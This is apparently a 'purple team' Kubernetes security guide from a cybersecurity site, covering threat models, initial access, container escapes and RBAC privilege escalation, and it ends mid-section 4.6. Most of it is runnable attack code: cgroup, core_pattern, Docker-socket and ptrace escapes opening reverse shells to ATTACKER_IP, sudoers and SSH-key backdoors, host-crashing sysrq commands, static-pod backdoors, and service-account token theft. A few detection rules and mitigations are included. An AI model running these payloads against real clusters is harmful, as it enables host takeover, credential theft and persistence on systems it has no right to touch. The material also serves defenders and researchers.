blacktemple.net · Cybersecurity News & Analysis · © 2026

Kubernetes Security Deep Dive — Attacks, Hardening, and Monitoring


[MODE: PURPLE] — Bridging offense and defense across the entire Kubernetes attack surface.

Last Updated: 2026-03-15
Sources: Kubernetes Goat, kube-bench, kube-hunter, KubeHound, Peirates, CDK, BadPods, kubesec, Popeye, Kubescape, Polaris, Microsoft K8s Threat Matrix, MITRE ATT&CK Containers Matrix, Falco, OPA/Gatekeeper, Kyverno, external-secrets-operator


Table of Contents

  1. Kubernetes Threat Model
  2. Initial Access
  3. Container Escape Techniques
  4. Privilege Escalation
  5. Lateral Movement
  6. Persistence
  7. Credential Access
  8. Data Exfiltration
  9. Defense Evasion
  10. Detection Engineering
  11. Hardening
  12. Offensive and Defensive Tooling
  13. Cloud-Specific Kubernetes Attacks

1. Kubernetes Threat Model

1.1 Attack Surface Overview

┌──────────────────────────────────────────────────────────────────────┐
│                    KUBERNETES ATTACK SURFACE                         │
├──────────────────────────────────────────────────────────────────────┤
│                                                                      │
│  ┌─────────────┐   ┌──────────┐   ┌────────────┐   ┌─────────────┐ │
│  │  API Server  │   │  etcd    │   │  Kubelet   │   │  Container  │ │
│  │  (6443)      │   │  (2379)  │   │  (10250)   │   │  Runtime    │ │
│  │              │   │  (2380)  │   │  (10255)   │   │  (CRI sock) │ │
│  └──────┬───────┘   └────┬─────┘   └─────┬──────┘   └──────┬──────┘ │
│         │                │               │                  │        │
│  ┌──────┴───────┐   ┌────┴─────┐   ┌─────┴──────┐   ┌──────┴──────┐ │
│  │ Scheduler    │   │ CoreDNS  │   │ kube-proxy │   │  Network    │ │
│  │ Ctrl Manager │   │          │   │            │   │  (CNI/svc)  │ │
│  └──────────────┘   └──────────┘   └────────────┘   └─────────────┘ │
│                                                                      │
│  External: Cloud IMDS │ CI/CD │ Registry │ Dashboards │ Ingress     │
└──────────────────────────────────────────────────────────────────────┘

1.2 Component Threat Analysis

| Component | Port(s) | Threats | Impact if Compromised |
|---|---|---|---|
| API Server | 6443 | Anonymous auth, RBAC bypass, audit evasion | Full cluster control |
| etcd | 2379, 2380 | Unauthenticated access, data dump, secret extraction | All cluster state and secrets |
| Kubelet | 10250, 10255 | Anonymous exec, pod listing, container log access | Node-level code execution |
| Container Runtime | Unix socket | Socket escape, image manipulation, container creation | Node root access |
| kube-proxy | 10256 | CVE-2020-8558 (localhost bypass), traffic manipulation | Pod traffic interception |
| CoreDNS | 53 | ConfigMap poisoning, DNS rebinding, cache poisoning | Service traffic redirection |
| Cloud IMDS | 169.254.169.254 | IAM credential theft, metadata enumeration | Cloud account compromise |
| Scheduler | 10259 | Malicious scheduling, resource exhaustion | Workload placement manipulation |
| Controller Manager | 10257 | SA key theft, root CA access | Cluster-wide impersonation |
| Admission Controllers | Varies | Webhook bypass, malicious mutation, TOCTOU | Policy enforcement bypass |

1.3 Trust Boundaries

┌─────────────────────────────────────────────────────────────────┐
│ INTERNET                                                         │
│  ┌───────────────────────────────────────────────────────────┐   │
│  │ CLOUD VPC                                                  │   │
│  │  ┌─────────────────────────────────────────────────────┐   │   │
│  │  │ KUBERNETES CLUSTER                                   │   │   │
│  │  │  ┌──────────────────────────────────────────────┐    │   │   │
│  │  │  │ NAMESPACE (tenant isolation boundary)         │    │   │   │
│  │  │  │  ┌───────────────────────────────────────┐    │    │   │   │
│  │  │  │  │ POD (network/PID/mount namespace)      │    │    │   │   │
│  │  │  │  │  ┌────────────────────────────────┐    │    │    │   │   │
│  │  │  │  │  │ CONTAINER (cgroup/seccomp/caps) │    │    │    │   │   │
│  │  │  │  │  └────────────────────────────────┘    │    │    │   │   │
│  │  │  │  └───────────────────────────────────────┘    │    │   │   │
│  │  │  └──────────────────────────────────────────────┘    │   │   │
│  │  └─────────────────────────────────────────────────────┘   │   │
│  └───────────────────────────────────────────────────────────┘   │
└─────────────────────────────────────────────────────────────────┘

Trust boundary violations (each is an attack class):
  Internet → VPC:        Exposed services, ingress vulns, SSRF
  VPC → Cluster:         API server exposure, etcd exposure, kubelet exposure
  Cluster → Namespace:   RBAC escalation, NetworkPolicy gaps, SA token theft
  Namespace → Pod:       Pod creation with host access, sidecar injection
  Pod → Container:       Container escape, privilege escalation
  Container → Node:      Privileged breakout, hostPath, runtime CVEs
  Node → Cloud:          IMDS access, node IAM role abuse

1.4 Microsoft Kubernetes Threat Matrix

| Tactic | Techniques |
|---|---|
| Initial Access | Using cloud credentials, Compromised image in registry, Kubeconfig file, Application vulnerability, Exposed sensitive interfaces |
| Execution | Exec into container, bash/cmd inside container, New container, Application exploit (RCE), SSH server running inside container, Sidecar injection |
| Persistence | Backdoor container, Writable hostPath mount, Kubernetes CronJob, Malicious admission controller, Container service account, Static pods |
| Privilege Escalation | Privileged container, Cluster-admin binding, Writable hostPath mount, Access cloud resources |
| Defense Evasion | Clear container logs, Delete Kubernetes events, Pod/container name similarity, Connect from proxy server |
| Credential Access | List Kubernetes secrets, Mount service principal, Container service account, Application credentials in config files, Access managed identity credentials, Malicious admission controller |
| Discovery | Access Kubernetes API server, Access Kubelet API, Network mapping, Exposed sensitive interfaces, Instance Metadata API |
| Lateral Movement | Access cloud resources, Container service account, Cluster internal networking, Application credentials in config files, Writable hostPath mount, CoreDNS poisoning, ARP poisoning and IP spoofing |
| Collection | Images from a private registry, Collecting data from pod |
| Impact | Data destruction, Resource hijacking, Denial of service |

1.5 MITRE ATT&CK Containers Matrix

| Tactic | Technique ID | Technique Name |
|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application |
| | T1133 | External Remote Services |
| | T1078 | Valid Accounts (.001 Default, .003 Local) |
| Execution | T1609 | Container Administration Command |
| | T1610 | Deploy Container |
| | T1053.007 | Container Orchestration Job |
| | T1204.003 | Malicious Image |
| Persistence | T1098.006 | Additional Container Cluster Roles |
| | T1136.001 | Create Local Account |
| | T1543.005 | Container Service |
| | T1525 | Implant Internal Image |
| | T1053.007 | Container Orchestration Job |
| | T1078 | Valid Accounts |
| Privilege Escalation | T1098.006 | Additional Container Cluster Roles |
| | T1543.005 | Container Service |
| | T1611 | Escape to Host |
| | T1068 | Exploitation for Privilege Escalation |
| | T1053.007 | Container Orchestration Job |
| Defense Evasion | T1612 | Build Image on Host |
| | T1610 | Deploy Container |
| | T1562.001 | Disable or Modify Tools |
| | T1070 | Indicator Removal |
| | T1036.005 | Match Legitimate Resource Name/Location |
| | T1550.001 | Application Access Token |
| Credential Access | T1110 | Brute Force (.001/.003/.004) |
| | T1528 | Steal Application Access Token |
| | T1552.001 | Credentials In Files |
| | T1552.007 | Container API |
| Discovery | T1613 | Container and Resource Discovery |
| | T1046 | Network Service Discovery |
| | T1069 | Permission Groups Discovery |
| Lateral Movement | T1550.001 | Application Access Token |
| Impact | T1485 | Data Destruction |
| | T1499 | Endpoint Denial of Service |
| | T1496.001 | Compute Hijacking |
| | T1496.002 | Bandwidth Hijacking |

2. Initial Access

2.1 Exposed Kubernetes Dashboard

ATT&CK: T1133 (External Remote Services)

The Kubernetes Dashboard, if exposed without authentication, provides full cluster management via web UI.

# Discovery — Shodan / OSINT
# Shodan dork: "kubernetes dashboard" port:443
# Google dork: inurl:"/api/v1/namespaces/kubernetes-dashboard"

# Direct access test
curl -k https://[TARGET]:443/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/

# Common exposed paths
https://[TARGET]:30000/                          # NodePort default
https://[TARGET]:443/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
https://[TARGET]:8443/                           # Direct dashboard port

Skip Login Exploitation — if --enable-skip-login flag is set:

# Dashboard allows unauthenticated access
# Navigate to the dashboard URL and click "Skip"
# This uses the dashboard's own service account permissions

# Check dashboard service account permissions
kubectl auth can-i --list --as=system:serviceaccount:kubernetes-dashboard:kubernetes-dashboard

Token-based access — if you have any valid token:

# Use a stolen service account token to authenticate
# Paste the token into the dashboard login screen
# The dashboard will operate with that token's permissions

DETECTION OPPORTUNITY: Monitor for external access to dashboard endpoints. Alert on --enable-skip-login in dashboard deployment args.
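That deployment-args check can be scripted. A minimal sketch (the args value below is a fabricated sample of what the jsonpath query would return on a vulnerable deployment):

```shell
# Sample output of:
#   kubectl -n kubernetes-dashboard get deploy kubernetes-dashboard \
#     -o jsonpath='{.spec.template.spec.containers[0].args}'
# (fabricated for illustration)
args='["--auto-generate-certificates","--enable-skip-login"]'

# Flag the dangerous argument; `--` stops grep option parsing so the
# pattern may begin with a dash
if printf '%s' "$args" | grep -q -- '--enable-skip-login'; then
  echo "ALERT: dashboard allows unauthenticated skip-login"
fi
```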

2.2 Anonymous Kubelet Access

ATT&CK: T1078.001 (Valid Accounts: Default Accounts)

# Kubelet read-only port (10255) — deprecated but often enabled
curl http://[NODE_IP]:10255/pods
curl http://[NODE_IP]:10255/spec
curl http://[NODE_IP]:10255/stats/summary
curl http://[NODE_IP]:10255/metrics

# Kubelet authenticated port (10250) — check for anonymous auth
curl -k https://[NODE_IP]:10250/pods
curl -k https://[NODE_IP]:10250/runningpods/

# If anonymous auth is enabled, execute commands in any pod on the node
curl -k -X POST "https://[NODE_IP]:10250/run/[NAMESPACE]/[POD]/[CONTAINER]" \
  -d "cmd=id"

curl -k -X POST "https://[NODE_IP]:10250/run/kube-system/kube-proxy-xxxxx/kube-proxy" \
  -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

# Read container logs
curl -k "https://[NODE_IP]:10250/containerLogs/kube-system/etcd-master/etcd"

# Mass scan for open kubelets
nmap -sS -p 10250,10255 [CIDR] --open
for ip in $(cat kubelet_hosts.txt); do
  echo "=== $ip ==="
  curl -sk "https://$ip:10250/pods" | head -c 200
done

DETECTION OPPORTUNITY: Alert on kubelet API access from non-API-server IPs. Monitor port 10255 connections.

2.3 Anonymous API Server Access

ATT&CK: T1078.001 (Valid Accounts: Default Accounts)

# API server anonymous auth is enabled by default (--anonymous-auth=true)
# Anonymous user: system:anonymous, group: system:unauthenticated

# Test anonymous access
curl -k https://[API_SERVER]:6443/api
curl -k https://[API_SERVER]:6443/version
curl -k https://[API_SERVER]:6443/api/v1/namespaces
curl -k https://[API_SERVER]:6443/api/v1/pods
curl -k https://[API_SERVER]:6443/apis
curl -k https://[API_SERVER]:6443/healthz

# Check anonymous permissions
kubectl auth can-i --list --as=system:anonymous

# Dangerous: some clusters bind system:unauthenticated to cluster-admin
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.subjects[]? | select(.name == "system:anonymous" or .name == "system:unauthenticated"))'

# Enumerate API resources available anonymously
curl -k https://[API_SERVER]:6443/api/v1 | jq '.resources[].name'

2.4 Misconfigured RBAC

ATT&CK: T1078 (Valid Accounts)

# Overly permissive default service account
kubectl auth can-i --list --as=system:serviceaccount:default:default

# Common misconfigurations to check
kubectl get clusterrolebindings -o json | jq '
  .items[] | select(
    .roleRef.name == "cluster-admin" and
    (.subjects[]? | .kind == "ServiceAccount")
  ) | {name: .metadata.name, subjects: .subjects}'

# Wildcard permissions (anything goes)
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? | .verbs[]? == "*") |
  {name: .metadata.name, rules: .rules}'

# Service accounts with secret access
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? |
    (.resources[]? == "secrets") and
    ((.verbs[]? == "get") or (.verbs[]? == "list") or (.verbs[]? == "*"))
  ) | {name: .metadata.name}'
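The wildcard-verb filter above can be dry-run against canned API output before pointing it at a live cluster. A sketch using a fabricated ClusterRole list shaped like `kubectl get clusterroles -o json` (the role names are invented):

```shell
# Two fabricated roles: one with wildcard verbs, one read-only
cat > /tmp/roles.json << 'EOF'
{"items":[
  {"metadata":{"name":"god"},
   "rules":[{"apiGroups":["*"],"resources":["*"],"verbs":["*"]}]},
  {"metadata":{"name":"viewer"},
   "rules":[{"apiGroups":[""],"resources":["pods"],"verbs":["get","list"]}]}
]}
EOF

# Same select() as the live query: emit only roles granting "*" verbs
jq -r '.items[] | select(.rules[]? | .verbs[]? == "*") | .metadata.name' /tmp/roles.json
```

Only `god` is printed; `viewer` is filtered out because none of its verbs is a wildcard.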

2.5 CI/CD Pipeline Compromise

ATT&CK: T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain)

# Common CI/CD → K8s attack vectors:

# 1. Stolen kubeconfig from CI runner
# GitHub Actions: secrets.KUBECONFIG or ~/.kube/config
# GitLab CI: KUBECONFIG variable or mounted file
# Jenkins: Kubernetes plugin credentials

# 2. CI runner service account is overprivileged
# Verify from compromised runner:
kubectl auth can-i --list
kubectl auth can-i create clusterrolebindings
kubectl get secrets -A

# 3. Image tag manipulation (supply chain)
# Push backdoored image with same tag
docker build -t registry.example.com/app:latest -f Dockerfile.backdoor .
docker push registry.example.com/app:latest
# Pods with imagePullPolicy: Always will pull the backdoor on restart

# 4. Helm chart poisoning
# Modify chart values to inject:
# - initContainers with host filesystem access
# - sidecar containers for credential theft
# - modified securityContext for privilege escalation

# 5. GitOps repository compromise (ArgoCD / Flux)
# Modify Git repo → ArgoCD auto-syncs malicious manifests
# Add privileged pods, modify RBAC, inject CronJobs

# In older ArgoCD releases the initial admin password was the argocd-server
# pod name; current releases store it in a dedicated secret:
kubectl -n argocd get secret argocd-initial-admin-secret \
  -o jsonpath='{.data.password}' | base64 -d

# Check for exposed ArgoCD API
curl -k https://[ARGOCD_SERVER]/api/v1/applications

2.6 Exposed Sensitive Interfaces

ATT&CK: T1133 (External Remote Services)

# Commonly exposed management interfaces
# etcd
curl http://[IP]:2379/version
curl http://[IP]:2379/v2/keys/?recursive=true

# cAdvisor (container metrics — may leak environment variables)
curl http://[NODE_IP]:4194/containers/

# Kubernetes API via kubectl proxy (if left running)
curl http://[NODE_IP]:8001/api/v1/namespaces/kube-system/secrets

# Prometheus / Grafana (metrics may reveal secrets, architecture)
curl http://[IP]:9090/api/v1/targets
curl http://[IP]:3000/api/dashboards/home

# Weave Scope (full cluster topology + exec into containers)
curl http://[IP]:4040/api/topology

# Jaeger (tracing — may contain sensitive request data)
curl http://[IP]:16686/api/traces

# Scan for common K8s management ports
nmap -sS -p 2379,2380,4194,6443,8001,8080,8443,9090,10250,10255,10256,16686,30000-32767 [TARGET]

2.7 Application Vulnerability (SSRF to Internal Services)

ATT&CK: T1190 (Exploit Public-Facing Application)

# SSRF from a web application into Kubernetes internal services

# Target the API server from within the cluster
curl https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/secrets \
  -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
  -k

# Target cloud metadata
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Target kubelet API
curl -k https://[NODE_IP]:10250/runningpods/

# Target etcd
curl http://[ETCD_IP]:2379/v2/keys/?recursive=true

# Target internal services via DNS
# service.namespace.svc.cluster.local
curl http://[SERVICE].default.svc.cluster.local/

3. Container Escape Techniques

3.1 Privileged Container Escapes

3.1.1 Cgroup Release Agent Escape (cgroup v1)

Prerequisite: privileged: true, cgroup v1 ATT&CK: T1611 (Escape to Host)

# Compact PoC one-liner (run as a script: the command to execute on the host is passed in as $1)
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
mkdir -p $d/w; echo 1 > $d/w/notify_on_release
t=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
touch /o; echo $t/c > $d/release_agent
printf '#!/bin/sh\n%s >%s/o' "$1" "$t" > /c
chmod +x /c; sh -c "echo 0 >$d/w/cgroup.procs"; sleep 1; cat /o

# Expanded version with reverse shell
cat > /escape.sh << 'ESCAPE'
#!/bin/bash
overlay=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
cgroup_dir=$(dirname $(ls -x /sys/fs/cgroup/*/release_agent 2>/dev/null | head -n1))
mkdir -p "$cgroup_dir/pwn"
echo 1 > "$cgroup_dir/pwn/notify_on_release"
echo "$overlay/cmd.sh" > "$cgroup_dir/release_agent"

cat > /cmd.sh << 'CMD'
#!/bin/sh
/bin/bash -c "/bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
CMD
chmod +x /cmd.sh

# Trigger: create and immediately kill a process in the cgroup
sh -c "echo \$\$ > $cgroup_dir/pwn/cgroup.procs"
ESCAPE
chmod +x /escape.sh

How it works: When all processes in a cgroup exit and notify_on_release is set to 1, the kernel executes the binary specified in release_agent as root on the host. Since privileged containers can write to /sys/fs/cgroup, the attacker sets release_agent to a script on the host filesystem (accessible via the overlay mount) and triggers execution.
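The fragile-looking sed expression that recovers the overlay upperdir can be sanity-checked offline against a sample /etc/mtab line (the paths below are fabricated):

```shell
# Typical overlayfs entry as seen from inside a Docker container
line='overlay / overlay rw,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,upperdir=/var/lib/docker/overlay2/xyz/diff,workdir=/var/lib/docker/overlay2/xyz/work 0 0'

# Same expression as the escape scripts: the greedy .* anchors on the
# "perdir=" suffix of "upperdir=" and captures up to the next comma
upper=$(printf '%s\n' "$line" | sed -n 's/.*\perdir=\([^,]*\).*/\1/p')
echo "$upper"
```

It prints the upperdir path, i.e. the host-side directory where files created at the container root actually live, which is what makes the host-visible `release_agent` script possible.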

Detection -- Falco Rule:

- rule: Cgroup Release Agent File Modification
  desc: Detect writes to cgroup release_agent indicating container escape
  condition: >
    open_write and
    fd.name endswith "release_agent" and
    container.id != ""
  output: >
    Cgroup release_agent modified in container
    (user=%user.name command=%proc.cmdline file=%fd.name container=%container.name image=%container.image.repository)
  priority: CRITICAL
  tags: [container, escape, T1611]

3.1.2 nsenter Escape

Prerequisite: privileged: true + hostPID: true

# Enter all namespaces of PID 1 (host init process)
nsenter -t 1 -m -u -n -i sh
# -t 1  : target PID 1 (init)
# -m    : mount namespace
# -u    : UTS namespace (hostname)
# -n    : network namespace
# -i    : IPC namespace

# Full host root shell. Now harvest credentials:
find /var/lib/kubelet/pods/ -name token -type l 2>/dev/null | while read t; do
  echo "=== $t ==="
  cat "$t" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -c \
    "import sys,json; d=json.load(sys.stdin); print(d.get('sub','?'))" 2>/dev/null
done

# Grab kubeconfig
cat /etc/kubernetes/admin.conf 2>/dev/null
cat /root/.kube/config 2>/dev/null

3.1.3 Device Mount Escape

Prerequisite: privileged: true

# List host block devices (privileged grants access to /dev)
fdisk -l
lsblk

# Mount the host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host   # or /dev/nvme0n1p1, /dev/vda1, etc.

# Full read/write access to host filesystem
cat /mnt/host/etc/shadow
echo "attacker ALL=(ALL) NOPASSWD:ALL" >> /mnt/host/etc/sudoers

# Plant SSH backdoor
mkdir -p /mnt/host/root/.ssh
echo "ssh-ed25519 AAAA... attacker@host" >> /mnt/host/root/.ssh/authorized_keys

# Chroot for full host environment
chroot /mnt/host /bin/bash

3.1.4 Docker Socket Escape

Prerequisite: Docker socket mounted at /var/run/docker.sock

# Verify socket access
ls -la /var/run/docker.sock

# List all containers on the host
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | jq '.[].Names'

# Create a privileged container with host filesystem mounted
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "ubuntu:latest",
    "Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"],
    "HostConfig": {
      "Privileged": true,
      "PidMode": "host",
      "NetworkMode": "host",
      "Binds": ["/:/hostroot"]
    }
  }' \
  http://localhost/containers/create

# Start the container
curl -s --unix-socket /var/run/docker.sock -X POST \
  http://localhost/containers/[CONTAINER_ID]/start

# Or with docker CLI if available
docker -H unix:///var/run/docker.sock run -it --privileged \
  --pid=host --net=host -v /:/hostroot ubuntu chroot /hostroot bash

3.1.5 Core Pattern Escape

Prerequisite: privileged: true or CAP_SYS_ADMIN

# /proc/sys/kernel/core_pattern controls what runs when a process dumps core
# If it starts with |, the kernel pipes the core dump to that program
overlay=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo '#!/bin/bash' > /payload.sh
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /payload.sh
chmod +x /payload.sh

# Set core_pattern to execute our payload
echo "|$overlay/payload.sh" > /proc/sys/kernel/core_pattern

# Trigger a core dump
sleep 10 &
kill -SIGSEGV $!

3.1.6 /proc/sysrq-trigger Abuse

Prerequisite: privileged: true or write access to /proc/sysrq-trigger

# SysRq allows direct kernel commands -- mostly DoS in container context
echo c > /proc/sysrq-trigger   # Crash the host (kernel panic)
echo b > /proc/sysrq-trigger   # Force immediate reboot
echo i > /proc/sysrq-trigger   # Kill all processes except init

# Reboots may cause pods to restart with weaker security if
# admission controllers are down during node recovery

3.2 hostPath Mount Escapes

ATT&CK: T1552.001 (Credentials in Files), T1006 (Direct Volume Access)

apiVersion: v1
kind: Pod
metadata:
  name: hostpath-escape
spec:
  containers:
  - name: pwn
    image: ubuntu
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /host
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /

kubectl apply -f hostpath-escape.yaml
kubectl exec -it hostpath-escape -- bash

# Full host filesystem at /host
strings /host/var/lib/etcd/member/snap/db | grep eyJhbGciOiJ
find /host/var/lib/kubelet/pods -name token -type l -exec cat {} \;
cat /host/var/lib/kubelet/config.yaml

# Plant static pod (bypasses all admission controllers)
cat > /host/etc/kubernetes/manifests/backdoor.yaml << 'MANIFEST'
apiVersion: v1
kind: Pod
metadata:
  name: static-backdoor
  namespace: kube-system
spec:
  hostNetwork: true
  hostPID: true
  containers:
  - name: backdoor
    image: ubuntu
    command: ["bash", "-c", "while true; do sleep 3600; done"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: root
  volumes:
  - name: root
    hostPath:
      path: /
MANIFEST

3.3 CVE-Based Container Escapes

3.3.1 CVE-2019-5736 -- runc Host Binary Overwrite

CVSS: 8.6 | Component: runc < 1.0-rc6

# When a container process accesses /proc/self/exe, it points to the
# runc binary on the host. By replacing the container entrypoint with
# a symlink to /proc/self/exe, the next exec overwrites host runc.

# 1. Replace container binary with symlink
cp /bin/bash /bin/bash.bak
ln -sf /proc/self/exe /bin/bash

# 2. When an admin runs `docker exec ... bash`, the exec'd "bash" is now
#    the host runc binary itself. A watcher process in the container finds
#    the runc PID and opens /proc/[runc_pid]/exe; writes fail with ETXTBSY
#    while runc is running, so the PoC holds the fd and retries until runc
#    exits, then overwrites the host runc binary with a payload such as:
cat > /payload.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
EOF

# 3. The next runc invocation on the host executes the payload as root
# PoC tool: github.com/Frichetten/CVE-2019-5736-PoC

Mitigation: Update runc >= 1.0-rc6. Use read-only /proc. Use rootless containers.

3.3.2 CVE-2020-15257 -- containerd Shim API Exposure

CVSS: 5.2 | Component: containerd < 1.3.9, < 1.4.3

# containerd-shim API exposed on abstract unix socket
# accessible from containers with host network namespace (hostNetwork: true)
cat /proc/net/unix | grep containerd-shim

# Exploit via CDK
cdk run shim-pwn

3.3.3 CVE-2022-0185 -- Heap Overflow in Legacy Filesystem Context

CVSS: 8.4 | Component: Linux kernel < 5.16.2

# Heap buffer overflow in fs_context via legacy_parse_param()
# Allows container escape from unprivileged user namespace

# Check if exploitable
cat /proc/sys/kernel/unprivileged_userns_clone   # Should be 1
uname -r                                          # Kernel 5.1 to 5.16.1

# Exploit abuses heap overflow to gain arbitrary write,
# overwrites cred struct to get root, escapes via setns to host
# PoC: github.com/Crusaders-of-Rust/CVE-2022-0185

Mitigation: Patch kernel. Set kernel.unprivileged_userns_clone=0. Seccomp block unshare.

3.3.4 CVE-2024-21626 -- runc Working Directory Breakout (Leaky Vessels)

CVSS: 8.6 | Component: runc < 1.1.12

# runc leaks an open file descriptor to a host directory (/sys/fs/cgroup)
# into the container process as /proc/self/fd/[N] (often 7 or 8)

# Attack via Dockerfile:
# FROM ubuntu
# WORKDIR /proc/self/fd/7   <- process starts inside a host directory

# Attack via exec: traverse out of the leaked fd with ..
docker exec --workdir /proc/self/fd/7 container_name \
  cat ../../../../../../../../etc/shadow
# Reads the HOST /etc/shadow

# Buildkit attack during image build:
# FROM ubuntu
# RUN --mount=type=cache,target=/proc/self/fd/7 cat /etc/shadow

Mitigation: Update runc >= 1.1.12, Docker >= 25.0.1, containerd >= 1.6.28.
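The primitive behind the bug is ordinary /proc behavior and can be reproduced on any Linux host, no container required: a directory fd inherited across exec is reachable as a path under /proc/self/fd. A minimal, non-exploit sketch:

```shell
# Open /etc on fd 7 of the current shell; fds opened via redirection
# are not close-on-exec, so child processes inherit fd 7
exec 7< /etc

# Path traversal through the fd: /proc/self/fd/7 is a magic symlink
# to whatever directory the fd refers to
cat /proc/self/fd/7/passwd > /dev/null && echo "fd 7 resolves into /etc"

exec 7<&-   # close the fd again
```

In the CVE, the leaked fd points at a host directory, so the same traversal walks out of the container's mount namespace.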

3.3.5 CVE-2022-0492 -- Cgroup Escape via User Namespaces

CVSS: 7.0 | Component: Linux kernel cgroups

# Unprivileged cgroup escape when user namespaces enabled + cgroup v1 + no LSM
unshare -Urm sh -c 'mkdir /tmp/cg && mount -t cgroup -o rdma cgroup /tmp/cg && echo VULNERABLE'

# Uses same release_agent technique but without requiring privileged: true

3.4 Ptrace-Based Escape

Prerequisite: CAP_SYS_PTRACE + hostPID: true

ps auxww | grep -v grep | grep root
gdb -p [HOST_ROOT_PID]
(gdb) call (int)system("bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'")
(gdb) detach
(gdb) quit

3.5 Escape Summary Matrix

| Technique | Required Privileges | Cgroup | Kernel Patch? | Result |
|---|---|---|---|---|
| Cgroup release_agent | privileged | v1 | No | Host code exec |
| nsenter | privileged + hostPID | Any | No | Full host shell |
| Device mount | privileged | Any | No | Host filesystem |
| Docker socket | Socket mount | Any | No | New container |
| Core pattern | privileged/CAP_SYS_ADMIN | Any | No | Host code exec |
| CVE-2019-5736 | Any (on exec) | Any | Yes (runc) | Host binary overwrite |
| CVE-2022-0185 | User namespace | Any | Yes (kernel) | Heap overflow to root |
| CVE-2024-21626 | Any (build/exec) | Any | Yes (runc) | FD leak to host fs |
| CVE-2022-0492 | User namespace | v1 | Yes (kernel) | Unpriv cgroup escape |
| Ptrace inject | CAP_SYS_PTRACE+hostPID | Any | No | Process injection |

4. Privilege Escalation

4.1 RBAC Abuse -- Create Pods

ATT&CK: T1098.006 (Additional Container Cluster Roles)

If an identity can create pods, it can escalate to any service account in the same namespace.

# Check if current identity can create pods
kubectl auth can-i create pods

# Create a pod with a high-privilege service account
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: escalate-via-pod
  namespace: kube-system
spec:
  serviceAccountName: clusterrole-aggregation-controller
  automountServiceAccountToken: true
  containers:
  - name: pwn
    image: ubuntu
    command: ["sleep", "infinity"]
EOF

# Access the mounted token
kubectl exec -it escalate-via-pod -n kube-system -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Use the stolen token
TOKEN=$(kubectl exec escalate-via-pod -n kube-system -- \
  cat /var/run/secrets/kubernetes.io/serviceaccount/token)
kubectl --token=$TOKEN auth can-i --list

4.2 RBAC Abuse -- Bind Roles

# If you can create RoleBindings/ClusterRoleBindings:
kubectl auth can-i create clusterrolebindings

# Bind cluster-admin to your service account
kubectl create clusterrolebinding pwned \
  --clusterrole=cluster-admin \
  --serviceaccount=default:default

# Bind to a user
kubectl create clusterrolebinding pwned-user \
  --clusterrole=cluster-admin \
  --user=attacker@example.com

# Bind to a group
kubectl create clusterrolebinding pwned-group \
  --clusterrole=cluster-admin \
  --group=system:authenticated

Note: RBAC escalation prevention has been built in since RBAC shipped (not new in 1.25) -- you cannot create a binding to a role carrying permissions you do not already hold unless you have the bind verb on that role, and you cannot create or update a role with such permissions unless you have the escalate verb on roles/clusterroles.

4.3 RBAC Abuse -- Escalate Verb

# The 'escalate' verb allows creating roles with ANY permissions
kubectl auth can-i escalate clusterroles

# If permitted, create a god-mode role
cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: god-mode
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
- nonResourceURLs: ["*"]
  verbs: ["*"]
EOF

# Bind it to yourself
kubectl create clusterrolebinding god-binding \
  --clusterrole=god-mode \
  --serviceaccount=default:default

4.4 RBAC Abuse -- Impersonate

# Check for impersonation permissions
kubectl auth can-i impersonate users
kubectl auth can-i impersonate groups
kubectl auth can-i impersonate serviceaccounts

# Impersonate a privileged identity (cluster-admin is a role, not a user --
# impersonate a user or group that is bound to it, e.g. system:masters)
kubectl auth can-i --list --as=admin --as-group=system:masters
kubectl get secrets -A --as=admin --as-group=system:masters

# Impersonate any service account
kubectl get secrets -A \
  --as=system:serviceaccount:kube-system:clusterrole-aggregation-controller

# Impersonate a group
kubectl get nodes --as=developer --as-group=system:masters

4.5 RBAC Abuse -- Token Request (create serviceaccounts/token)

# If you can create tokens for service accounts:
kubectl auth can-i create serviceaccounts/token

# Generate a token for any SA in the namespace
kubectl create token cluster-admin-sa -n kube-system --duration=87600h
# (the API server may silently cap the duration at its configured maximum)

# Use the TokenRequest API directly
curl -k -X POST \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  "https://kubernetes.default.svc/api/v1/namespaces/kube-system/serviceaccounts/default/token" \
  -d '{"apiVersion":"authentication.k8s.io/v1","kind":"TokenRequest","spec":{"expirationSeconds":315360000}}'

4.6 RBAC Abuse -- CSR Signing (Certificates)

# If you can create/approve CertificateSigningRequests:
kubectl auth can-i create certificatesigningrequests
